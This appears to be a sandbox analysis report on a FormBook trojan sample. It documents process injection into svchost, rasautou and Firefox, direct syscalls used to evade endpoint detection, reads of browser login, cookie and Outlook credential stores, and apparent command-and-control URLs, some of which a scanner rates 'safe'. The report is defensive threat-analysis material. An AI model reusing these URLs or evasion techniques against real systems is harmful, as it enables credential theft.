Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]	2_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]	2_2_03460854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]	2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]	2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]	2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]	2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]	2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]	2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]	2_2_034BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_0066A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_0066A66C

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_006581AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_006581AC
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00658189 SetUnhandledExceptionFilter,		0_2_00658189

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rasautou.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: NULL target: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: NULL target: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\rasautou.exe

Thread register set: target process: 7512

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\rasautou.exe

Thread APC queued: target process: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2845008

Jump to behavior

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_0066B106 LogonUserW,

0_2_0066B106

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_00633D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00633D19

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_0067411C SendInput,keybd_event,

0_2_0067411C

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_006774E7 mouse_event,

0_2_006774E7

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\HN1GiQ5tF7.exe"	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Process created: C:\Windows\SysWOW64\rasautou.exe "C:\Windows\SysWOW64\rasautou.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

0_2_0066A66C

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_006771FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_006771FA

Source: HN1GiQ5tF7.exe, NkMjNSuuRDBHuZ.exe, 0000000A.00000002.3719020346.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000A.00000000.1346511691.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3718995169.0000000001500000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: NkMjNSuuRDBHuZ.exe, 0000000A.00000002.3719020346.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000A.00000000.1346511691.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3718995169.0000000001500000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: NkMjNSuuRDBHuZ.exe, 0000000A.00000002.3719020346.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000A.00000000.1346511691.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3718995169.0000000001500000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: HN1GiQ5tF7.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: NkMjNSuuRDBHuZ.exe, 0000000A.00000002.3719020346.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000A.00000000.1346511691.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3718995169.0000000001500000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_006565C4 cpuid

0_2_006565C4

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_0068091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_0068091D

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_006AB340 GetUserNameW,

0_2_006AB340

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_00661E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00661E8E

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_0064DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0064DDC0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3710085344.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1422627308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3719237360.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3719398120.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3721503493.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1422984792.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3719141408.0000000002CE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1423410145.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\rasautou.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\rasautou.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: HN1GiQ5tF7.exe	Binary or memory string: WIN_81
Source: HN1GiQ5tF7.exe	Binary or memory string: WIN_XP
Source: HN1GiQ5tF7.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: HN1GiQ5tF7.exe	Binary or memory string: WIN_XPe
Source: HN1GiQ5tF7.exe	Binary or memory string: WIN_VISTA
Source: HN1GiQ5tF7.exe	Binary or memory string: WIN_7
Source: HN1GiQ5tF7.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3710085344.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1422627308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3719237360.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3719398120.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3721503493.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1422984792.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3719141408.0000000002CE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1423410145.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00688C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00688C4F
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0068923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_0068923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	5 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	5 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	11 Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
HN1GiQ5tF7.exe	79%	ReversingLabs	Win32.Trojan.AutoitInject
HN1GiQ5tF7.exe	68%	Virustotal		Browse
HN1GiQ5tF7.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://support.lolipop.jp/hc/ja/articles/360049132953	0%	Avira URL Cloud	safe
http://www.conansog.shop/m7wz/	0%	Avira URL Cloud	safe
http://www.tempatmudisini06.click/0kli/?40G=Fegsvl+OGDJHKeUkviVqrWXmfitRVJjJzbj1DgnmRmeFZ5KITSJ35O+CNkAnveOy+X8wGwFlf4nSYcZPMr6/ALB9HdTqqkiH2QBnBPtm52OUHeYVRkXu0orA8o5vf7k6+C2EbfsSUCNF&I6=x8CX	0%	Avira URL Cloud	safe
http://www.callyur.shop/hayl/?40G=7uA1bLkCaR9ampYb6jJSXGsXTCFtFEKjMbBrHkb2OaN+7KcXsqyJMoKLTM78+R5XhUdg+bLytXUVrFAv0hUdKQFF042Tw+6VIfe83rRo/9u22lJBgGdg0kCVzRF/7zaQBZrR0t81edm/&I6=x8CX	0%	Avira URL Cloud	safe
https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404	0%	Avira URL Cloud	safe
http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif	0%	Avira URL Cloud	safe
http://www.tempatmudisini06.click/0kli/	0%	Avira URL Cloud	safe
http://www.sitioseguro.blog	0%	Avira URL Cloud	safe
http://www.optimismbank.xyz/lnyv/	0%	Avira URL Cloud	safe
http://www.aiactor.xyz/g2y0/	0%	Avira URL Cloud	safe
http://www.questmatch.pro/ipd6/	0%	Avira URL Cloud	safe
http://www.sitioseguro.blog/arvb/	0%	Avira URL Cloud	safe
http://www.sankan-fukushi.info/21k5/?I6=x8CX&40G=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A4LwPHwyvUagu3NR6s+1WMK3FQ8gyne1SqlHaV7MI3WrY5r02MQ5JkbW	0%	Avira URL Cloud	safe
http://www.madhf.tech/vpqb/	0%	Avira URL Cloud	safe
http://www.aziziyeescortg.xyz/wbcb/?40G=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K3O6A/B6pmA5xGmAOUvp0kuEyHznIJjgzI6sNmSk1vDMl2v3exemO24i&I6=x8CX	0%	Avira URL Cloud	safe
http://www.a1shop.shop/0krx/	0%	Avira URL Cloud	safe
http://www.aiactor.xyz/g2y0/?I6=x8CX&40G=4J2ZucS0gmHveCLTumStwhEohSgzPPJ4W7Cx1bvPckMEbjsLQyn2mnrwN7XguYk0KfYRNkJmpBfqbfzPpDbCYFRZeOP0GfhrQZRrSAbT+Kmv6/SRHMYq+Ac5wEC2ErfnaeU3KKMi595E	0%	Avira URL Cloud	safe
http://www.housew.website/4pih/?40G=ZmPwAj1McUpIZiz0LuViOUq+B7yzDKheiuLx3j/o2iG3zDrxD498zlZSm94ILhpOzlwyZVIuLGPVSJZjqSUFLMq4/O2h+I/bDxqzy5zs+juv0ihYqY4w6XKkyY2pbw+VQr1Zt9gsO1Gc&I6=x8CX	0%	Avira URL Cloud	safe
https://pepabo.com/	0%	Avira URL Cloud	safe
http://www.sitioseguro.blog/arvb/?40G=ZBQQqxbud8SVIvMkbBf/fVH1me8478TvMeRY2MiH3kRRc/z7OAWaNoWdi819/s5bJQ0i5xulgwkm2DEXU68//ud7VMWFkg8aHFm5yBkuyjZoE2tjqm34JPZ+m3kLgGiOEtHU69tbM0ur&I6=x8CX	0%	Avira URL Cloud	safe
http://www.a1shop.shop/0krx/?40G=1C2HTrEVNWyxr52SoGOxlLLcvsNBoexmdy9Nu7HdX9lR7swAMLn31GhWzX/WtioZiLgkIr1TIYTpQv4lfQ4TwOSNsfSyMlf4rPNeG2/89f69I6MEwndXqV58tlctS1+W0a+BwgVQz/Ju&I6=x8CX	0%	Avira URL Cloud	safe
